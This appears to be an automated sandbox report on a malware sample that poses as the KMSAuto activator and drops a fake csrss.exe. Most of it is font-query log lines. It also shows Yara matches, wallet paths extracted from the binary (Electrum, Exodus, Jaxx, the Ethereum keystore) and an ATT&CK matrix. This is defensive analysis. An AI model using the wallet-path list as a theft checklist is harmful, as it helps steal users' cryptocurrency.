              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
              Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Program Files (x86)\KMSAuto\KMSAuto Net\KMSAuto Net.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Roaming\csrss.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.4.dr | Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.4.dr | Binary or memory string: procexp.exe

Stealing of Sensitive Information

Source: Yara match | File source: 1.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: csrss.exe PID: 5224, type: MEMORYSTR
Source: Yara match | File source: 1.2.csrss.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.285901899.0000000000401000.00000020.00000001.01000000.00000004.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: csrss.exe PID: 5224, type: MEMORYSTR
Source: csrss.exe | String found in binary or memory: electrum.dat
Source: csrss.exe | String found in binary or memory: %appdata%\Electrum\wallets\
Source: csrss.exe | String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: csrss.exe | String found in binary or memory: %APPDATA%\Exodus\
Source: csrss.exe | String found in binary or memory: %APPDATA%\Jaxx\Local Storage\
Source: csrss.exe | String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: csrss.exe | String found in binary or memory: %APPDATA%\Exodus\
Source: csrss.exe | String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: csrss.exe | String found in binary or memory: %APPDATA%\Ethereum\keystore\
Source: csrss.exe | String found in binary or memory: %appdata%\Electrum-LTC\wallets\
MITRE ATT&CK Matrix (listed per tactic column; the digits in parentheses are the signature-count badges shown on the report, reproduced as extracted; techniques without a badge are unmatched matrix cells)

• Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
• Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd
• Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
• Privilege Escalation: Process Injection (12); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
• Defense Evasion: Masquerading (12); Virtualization/Sandbox Evasion (12); Disable or Modify Tools (1); Process Injection (12); Obfuscated Files or Information (1); Steganography
• Credential Access: Credential API Hooking (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
• Discovery: Security Software Discovery (531); Virtualization/Sandbox Evasion (12); Process Discovery (2); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (214)
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
• Collection: Credential API Hooking (1); Archive Collected Data (1); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
• Command and Control: Encrypted Channel (1); Ingress Tool Transfer (2); Non-Application Layer Protocol (3); Application Layer Protocol (113); Fallback Channels; Multiband Communication
• Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
• Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
• Impact: Modify System Partition; Device Lockout; Delete Device Data
Behavior Graph ID: 834745 | Sample: ADDCDF9E3BAC722442FB269492F... | Start date: 25/03/2023 | Architecture: WINDOWS | Score: 100

Signatures on the sample: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for dropped file; 8 other signatures

Process tree (reconstructed from the behavior graph):
• ADDCDF9E3BAC722442FB269492FEA86E91D4E97EE5DF4.exe started
